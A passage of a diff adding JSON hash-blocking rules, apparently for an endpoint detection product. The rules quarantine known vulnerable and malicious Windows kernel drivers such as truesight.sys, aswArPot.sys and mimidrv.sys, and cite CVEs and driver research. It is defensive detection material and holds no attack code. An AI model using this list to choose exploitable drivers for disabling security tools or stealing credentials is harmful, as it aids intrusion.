+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472560Z",
+ "creation_date": "2026-03-23T11:45:30.472563Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472572Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "368a9c2b6f12adbe2ba65181fb96f8b0d2241e4eae9f3ce3e20e50c3a3cc9aa1",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0ff4a9c-a10c-59b8-b1e7-8a31631dec95",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827194Z",
+ "creation_date": "2026-03-23T11:45:31.827196Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827201Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "266634c80d0a590988a6eaf326be0b04dfd346c56cc3d1a8e5def6dc0f9a33cf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c1029495-dc2b-58db-b570-a956d5d4788a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832205Z",
+ "creation_date": "2026-03-23T11:45:30.832207Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832212Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0b6837a6b5af391099ddf151ad7a220d2ef95b169d1bcca4e5d9ce121252d918",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c105e7f2-c4cb-5e13-89dc-0a90a6dc5d5b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471713Z",
+ "creation_date": "2026-03-23T11:45:30.471716Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471725Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "80599708ce61ec5d6dcfc5977208a2a0be2252820a88d9ba260d8cdf5dc7fbe4",
+ "comment": "Vulnerable Kernel Driver (aka AsIO.sys) [https://www.loldrivers.io/drivers/bd7e78db-6fd0-4694-ac38-dbf5480b60b9/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c10b25ca-bcf0-5043-bd5f-1212d4ffa66e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832388Z",
+ "creation_date": "2026-03-23T11:45:30.832390Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832396Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "799cb4ddae59494541ad811507438aeb0615ed08a2e903cb66c3dd923044b952",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c10c6634-195b-580e-8abe-8306bf287c05",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826371Z",
+ "creation_date": "2026-03-23T11:45:30.826373Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826379Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d500f10df3b61bef3060820d27fff5f3f4559ae38c9e591a94d429385f75f08",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c11cdbc5-4973-58e4-b0a4-f2566e2d553f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983578Z",
+ "creation_date": "2026-03-23T11:45:29.983580Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983585Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "96bf3ee7c6673b69c6aa173bb44e21fa636b1c2c73f4356a7599c121284a51cc",
+ "comment": "Malicious Kernel Driver (aka ntbios.sys) [https://www.loldrivers.io/drivers/eef1fcf4-8c54-420b-8d38-9c5f95129dcc/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c12d3150-a651-5c25-98f6-1e0853cc1888",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614770Z",
+ "creation_date": "2026-03-23T11:45:29.614772Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614777Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "99f4994a0e5bd1bf6e3f637d3225c69ff4cd620557e23637533e7f18d7d6cba1",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c1343970-616f-59a3-9a1a-7f7bccc41961",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819192Z",
+ "creation_date": "2026-03-23T11:45:30.819194Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819199Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "43dc82fd548218f0e916687c997291c8056dfdcc5b5f5616833437f96d806a64",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c1394bff-8005-59f3-b0d0-a44be27e95d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968493Z",
+ "creation_date": "2026-03-23T11:45:29.968496Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968501Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0b542e47248611a1895018ec4f4033ea53464f259c74eb014d018b19ad818917",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c13f03b8-df2b-5c0c-afe8-731cce49d2aa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604591Z",
+ "creation_date": "2026-03-23T11:45:29.604593Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604598Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7128d13dc4269de832723d4a3a6cfd7e6553576a9e96464583eb8bb5c2f243aa",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c1414d27-3441-5ddf-b95d-7ab1d8b3e873",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489526Z",
+ "creation_date": "2026-03-23T11:45:31.489529Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489537Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0fedac4fe88aef03b44adcd23f94ce04074f75e44bc97ac9978f7f8909023e18",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c1430da3-6b1b-5e66-a30b-94a23d763e8b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145772Z",
+ "creation_date": "2026-03-23T11:45:32.145774Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145780Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5d61e4ea1b1294d5a042feb152dc5f9aa1397c45c3ed583621279dd4e69be418",
+ "comment": "Malicious Kernel Driver (aka driver_5d61e4ea.sys) [https://www.loldrivers.io/drivers/0215d6d6-e0c4-4a11-bd3a-40511f89d736/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c151b015-f21a-5030-9e76-0d847fd8f071",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614198Z",
+ "creation_date": "2026-03-23T11:45:29.614200Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614205Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7018d515a6c781ea6097ca71d0f0603ad0d689f7ec99db27fcacd492a9e86027",
+ "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c1577801-288d-57d6-9062-eb61e423dd18",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160588Z",
+ "creation_date": "2026-03-23T11:45:31.160590Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160595Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab11747906d1db3ab3adeeab2d0f14b20edad4064064f80c3860746448e56608",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c15b6516-cd5b-576f-ab09-746c3fed886b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488187Z",
+ "creation_date": "2026-03-23T11:45:31.488189Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488195Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1132883b99e795f19ce643184b1e3d33e1801fe19c6718ebcf2ca6f257a6b6ea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c169d28e-ac73-5064-ac6e-6b0d1b4bbfe7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980133Z",
+ "creation_date": "2026-03-23T11:45:29.980135Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980141Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "16e2b071991b470a76dff4b6312d3c7e2133ad9ac4b6a62dda4e32281952fb23",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c169e4f7-e705-53f8-8d26-442e55a60725",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831848Z",
+ "creation_date": "2026-03-23T11:45:30.831851Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831857Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7966e3d959150caebd4dd5dbaeae68fe28013a4043636ccf6350fda847c46bc6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c16a92d0-c385-519e-8145-d7cb56bb80f0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476904Z",
+ "creation_date": "2026-03-23T11:45:30.476907Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476916Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d0b918d766e6ce4218a833314525dd6eaeba83c597e9e1a9efefa7f95ec64a95",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c171752c-95f4-5c24-9ca4-65627d5880a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836789Z",
+ "creation_date": "2026-03-23T11:45:30.836792Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836797Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "247058a37cd8d8e09ac4e498578bf188f32ed2beb8858c8363e0651e1f67a0fe",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c17d0e3e-6b21-5224-8f35-96c8922bbd89",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160513Z",
+ "creation_date": "2026-03-23T11:45:31.160515Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160523Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b2f78cd04121615119903f0aded0bf383e5a8c7fb3f03f34a9b93aa5dbe5c20c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c187152c-19cd-5135-8567-3fcaa493a61f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465821Z",
+ "creation_date": "2026-03-23T11:45:30.465824Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465833Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9a42fa1870472c38a56c0a70f62e57a3cdc0f5bc142f3a400d897b85d65800ac",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c18a3ce5-35c5-5b68-8331-a9d2991ffd99",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969716Z",
+ "creation_date": "2026-03-23T11:45:29.969718Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
